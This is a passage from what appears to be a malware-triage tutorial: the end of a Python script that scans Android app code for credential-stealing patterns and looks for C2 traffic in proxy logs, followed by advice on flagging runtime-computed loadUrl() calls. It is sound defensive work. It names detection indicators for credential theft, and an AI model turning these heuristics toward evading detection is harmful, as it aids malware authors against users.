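    "2022-01-20T10:03:40Z 10.0.0.13 GET https://example.com/ 200 512",
]

if __name__ == "__main__":
    for name, src in [("smart scanner-like", SMART_SCANNER_LIKE),
                      ("PicsArt-like", PICSART_LIKE), ("benign", BENIGN)]:
        print(f"{name}: {verdict(scan_source(src))}")
    print("C2 traffic:", find_c2_traffic(PROXY_LOG))
```

The "suspicious" branch is the one worth keeping in a real triage pipeline: a sample whose only static tell is a JavaScript bridge next to a loadUrl() whose argument is computed at runtime is exactly the shape the PicsArt sample takes, and the decision to decrypt strings or run the APK under instrumentation should be made on that shape, not on whether m_login_email happens to appear in clear text.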